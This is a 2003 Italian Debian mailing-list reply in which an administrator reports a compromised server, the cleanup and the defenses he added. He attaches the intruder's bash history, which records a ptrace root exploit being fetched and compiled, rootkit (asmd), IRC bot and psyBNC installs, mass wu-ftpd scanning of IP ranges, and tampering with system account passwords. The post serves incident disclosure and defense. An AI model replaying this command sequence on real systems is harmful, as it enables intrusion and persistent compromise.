Re: server bucato
On Sun, Nov 09, 2003 at 11:39:16PM +0100, Mauro wrote:
> On Wednesday 05 November 2003 20:54, paolino wrote:
> > ciao, poco tempo fa mi è stato bucato un server...
> > non potendo reinstallarlo, almeno per il momento, volevo trovare un
> > mdo per tappare i vari buchi.
>
> Come ti sei accorto della sua compromissione?
Me ne sono accorto perche in giro per il sistema c'erano un tot di file, decisamente particolari.
Uno di quelli più interessanti è il file .bash_history dell'utente guest che vi allego.
Dategli un'occhiata.. a quel punto ho fatto un po di controlli, è ho trovato un sacco di cose..
Binari modificati in /bin /sbin ... non me ne sono accorto finchè, dopo anomalie di funzionamento degli stessi, non ho fatto un lsattr.
Poi ho fatto andare chkrootkit e mi ha trovato un tot di processi hidden
ecc. ecc.
Adesso penso di aver "ripulito" la macchina almeno dai rootkit che erano stati messi.
ho inserito un tot di controlli in piu (snort; aide e tiger), ho sistemato il logchek, chiuso un paio di servizi e acceso un cero...
Speriamo che per ora basti :)
fatemi sapere
Paolino
>
> --
> To UNSUBSCRIBE, email to debian-italian-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
--
La teoria e' quando si sa tutto ma non funziona niente.
La pratica e' quando funziona tutto ma non si sa il perche'.
In ogni caso si finisce sempre a coniugare la teoria con la
pratica : non funziona niente e non si sa il perche'.
Albert Einstein
cd /pub/
ls
exit
id
./pt
exit
ls
passwd
ls
wget http://packetstorm.linuxsecurity.org/0304-exploits/ptrace-kmod.c
gcc ptrace-kmod.c -o pt
./pt
exit
ls
nslookup
id
whoami
uname -a
ps -fea
cat /etc/passwd
passwd backup
passwd proxy
ls
rm -ef pt
rm -rf ptrace-kmod.c
rm -rf pt
ls
ls
/pt
ls
pt
./pt
ls
cd .atos
mkdir .atos
cd .atos
wget http://bahamut.ielf.org/other/bots/emech/2.8.x/emech-2.8.4.tar.gz
tar -zxvf emech-2.8.4.tar.gz
rm -rf emech-2.8.4.tar.gz
cd emech-2.8.4
./configure
y
make
mv sample.set mech.txt
cat > mech.set
./genuser
./mech
ls
./mech
./emech.users
./genuser
./mech
passwd
ls
cd .atos
ls
ls
uname -a
wget http://packetstorm.linuxsecurity.org/0304-exploits/ptrace-kmod.c
gcc ptrace-kmod.c -o pt
./pt
cat /etc/passwd
passwd mysql
passwd temp
passwd www
passwd www
passwd proxy
passwd www-data
ls
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/asmd.tgz
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/asmd.tgz
nslookup
ls
wget http://www.psychoid.lam3rz.de/psyBNC2.3.1.tar.gz
tar -zxvf psyBNC2.3.1.tar.gz
cd psybnc
make
pico psybnc.conf
ls
ps -fea
wget http://bahamut.ielf.org/other/bots/emech/2.8.x/emech-2.8.4.tar.gz
tar -zxvf emech-2.8.4.tar.gz
rm -rf emech-2.8.4.tar.gz
cd emech-2.8.4
./configure
make
make install
mv sample.set mech.txt
cat > mech.set
./genuser
./mech
./mech
./mech
ls
cd emech-2.8.4
./mech
./mech
./mech
kill -9 guest
kill -9 1782
kill -9 1847
kill -9 1849
kill -9 1865
kill -9
init: Mech(s) added [ shitz ]
kill -9 1867
kill -9 1956
ls
cd emech-2.8.4
./genuser
./mech
./mech
ps -fea
ls
ps -fea
passwd -Z
ls
./pt
ls
uname -a
ps -fea
wget http://bahamut.ielf.org/other/bots/emech/2.8.x/emech-2.8.4.tar.gz
tar -zxvf emech-2.8.4.tar.gz
rm -rf emech-2.8.4.tar.gz
cd emech-2.8.4
./configure
make
make install
mv sample.set mech.txt
cat > mech.set
./genuser
./mech
./mech
ps -fea
tar -zxvf autowu.zip
tar -zvf autowu.zip
ls
tar -zxvf autowu.zip
ls
ps -fea
ls
cd emech-2.8.4
./mech
cd ..
ls
ls
wget http://comunidad.vlex.com/wscrip/mamadas/scannerstgz/autowu.zip
passwd -Z
tar -zxvf autowu.zip
ls
./pt
wget http://mx.geocities.com/straorg/scanner/autowu.tgz
tar -zxvf autowu.tgz
cd autowu
./awu 214.115
cd ..
cd .kde
cd .kde
ls
mkdir .scan
cd .scan
wget http://mx.geocities.com/straorg/scanner/autowu.tgz
tar -zxvf autowu.tgz
cd .kde
cd autowu
./awu 0.0
./awu 212.12
passwd -Z
ls
./pt
ps -fea
kill -9 5938
ls
tar -zxvf psyBNC2.3.1.tar.gz
cd psybnc
make
pico psybnc.conf
cd ..
ls
cd emech-2.8.4
./mech
./mech
ps -fea
ls
cd emech-2.8.4
./mech
ps -fea
passwd -Z
cd ..
ls
./pt
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/asmd.tgz
tar zxf asmd.tgz
perl install.pl
passwd -Z
ls
wget www.geocities.com/master0n/bestwu.tgz
tar -zxvf bestwu.tgz
cd
aw
cd aw
./awu 0.0
./awu 217.13
./awu 217.16
./awu 219.230
./awu 219.213
./awu 219.20
./awu 218.121
./awu 128.17
./awu 12.143
./awu 212.15
./awu 212.112
./awu 212.20
./awu 212.24
./awu 212.29
/wu -a -v -d -f ns.hostuniverse.com
ps -fea
who
kill -9 28752
cd /usr/sbin
who
./userdel Ilic
who
cd ..
ls
cd ..
ls
wget www.geocities.com/master0n/bestwu.tgz
tar -zxvf bestwu.tgz
cd aw
./awu 0.0
./awu 137.2
./awu 137.19
./awu 218.12
./awu 218.13
./awu 208.101
./awu 208.41
./awu 208.119
./awu 208.211
passwd -Z
ls
ll
ls -lap
ll
ls
ls -lap
mc
cd /usr/sbin
ls
./useradd pippo
./userdel asdueba
Reply to: